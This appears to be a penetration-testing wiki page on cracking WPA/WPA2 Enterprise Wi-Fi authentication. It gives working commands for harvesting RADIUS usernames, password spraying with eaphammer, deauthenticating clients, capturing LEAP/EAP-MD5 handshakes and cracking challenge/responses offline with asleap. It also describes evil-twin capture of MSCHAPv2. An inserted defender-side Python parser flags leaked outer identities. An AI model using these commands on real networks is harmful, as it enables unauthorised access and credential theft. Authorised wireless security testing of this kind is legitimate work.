
08. WPA WPA2 Enterprise (MGT) Authentication Cracking

Koutto edited this page Nov 1, 2020 · 1 revision

RADIUS Usernames Capture

  • With Wireshark: look for Identity field in EAP messages of type "Response, Identity"
  • With crEAP:
python crEAP.py -i mon0 -c <channel>
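
As an added, defender-side example that is not part of the original page: a stdlib-only Python parser that pulls the Identity field out of EAPOL-encapsulated EAP Response/Identity frames and flags supplicants whose outer identity reveals a real username instead of an anonymous one. The frames, usernames and realm below are constructed sample data, and the function names are assumptions of this example.

```python
import struct

EAPOL_TYPE_EAP_PACKET = 0
EAP_CODE_RESPONSE = 2
EAP_TYPE_IDENTITY = 1


def build_identity_response(identity: str, eap_id: int = 1) -> bytes:
    """Build a constructed EAPOL frame carrying an EAP Response/Identity (sample data only)."""
    data = identity.encode()
    eap = struct.pack("!BBHB", EAP_CODE_RESPONSE, eap_id, 5 + len(data), EAP_TYPE_IDENTITY) + data
    return struct.pack("!BBH", 2, EAPOL_TYPE_EAP_PACKET, len(eap)) + eap


def extract_identity(frame: bytes):
    """Return the Identity string if frame is an EAP Response/Identity, else None."""
    if len(frame) < 4:
        return None
    _version, ptype, length = struct.unpack("!BBH", frame[:4])
    eap = frame[4:4 + length]
    if ptype != EAPOL_TYPE_EAP_PACKET or len(eap) < 5:
        return None
    code, _eap_id, eap_len, etype = struct.unpack("!BBHB", eap[:5])
    if code != EAP_CODE_RESPONSE or etype != EAP_TYPE_IDENTITY or eap_len > len(eap):
        return None
    return eap[5:eap_len].decode("utf-8", errors="replace")


def is_anonymous_outer_identity(identity: str) -> bool:
    """True when the user part is empty or 'anonymous', i.e. no real username is sent in clear."""
    user, _sep, _realm = identity.partition("@")
    return user == "" or user.lower() == "anonymous"


def audit_frames(frames):
    """Return (identity, exposed) per Response/Identity frame; exposed=True means a real username leaked."""
    findings = []
    for frame in frames:
        identity = extract_identity(frame)
        if identity is not None:
            findings.append((identity, not is_anonymous_outer_identity(identity)))
    return findings


# Constructed sample: two supplicants with an anonymous outer identity, one leaking its
# username, and one EAP Request/Identity (code 1) from the authenticator that must be ignored.
SAMPLE_FRAMES = [
    build_identity_response("anonymous@corp.example"),
    build_identity_response("@corp.example"),
    build_identity_response("jdoe@corp.example"),
    bytes([2, 0, 0, 5, 1, 1, 0, 5, 1]),
]

if __name__ == "__main__":
    for identity, exposed in audit_frames(SAMPLE_FRAMES):
        print(f"{identity!r}: {'EXPOSED' if exposed else 'ok'}")
```

Feeding real EAPOL payloads (e.g. exported from a capture) through audit_frames shows which clients still need an anonymous outer identity configured in their supplicant profile.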

RADIUS Accounts bruteforce / Password Spraying

./eaphammer --eap-spray \
	--interface-pool wlan0 wlan1 wlan2 wlan3 wlan4 \
	--essid <target_ESSID> \
	--password <password_to_spray> \
	--user-list <usernames_list>

The --interface-pool flag gives eaphammer a list of wireless interfaces to use in parallel (one worker per interface), which speeds up the spray. See https://github.com/s0lst1c3/eaphammer/wiki/XIII.-Password-Spraying

LEAP & EAP-MD5 Handshake Capture & Cracking

EAP-MD5 & LEAP do not use a secure tunnel to perform client authentication. Therefore, it is possible to sniff the authentication challenge/response and perform offline cracking.

  1. Capture traffic & write captured handshakes to file:
airodump-ng -c <channel> --bssid <AP_MAC> -w <capture> mon0
  2. (optional) Deauthenticate client from AP:
aireplay-ng --deauth 5 -c <MAC_target> -a <MAC_AP> mon0
  3. Crack:
eapmd5pass -r <capture> -w <wordlist>	# For EAP-MD5
asleap -r <capture> -W <wordlist>		# For LEAP (crack MSCHAPv2 challenge/response)
asleap -C <mschapv2_challenge> -R <mschapv2_response> -W <wordlist>  # Challenge/response colon-delimited format

MSCHAPv2 Challenge/Response Cracking (e.g. EAP-PEAPv0, EAP-TTLS, EAP-FAST)

  • MSCHAPv2 can be used as "Inner EAP/Authentication Protocol" (inside TLS tunnel) in several EAP methods, such as: EAP-PEAPv0, EAP-TTLS, EAP-FAST.
  • Capture of MSCHAPv2 Challenge/Response requires Rogue AP (Evil Twin Attack) + no validation of server's certificate on client (cf. eaphammer).
asleap -C <mschapv2_challenge> -R <mschapv2_response> -W <wordlist>  # Challenge/response colon-delimited format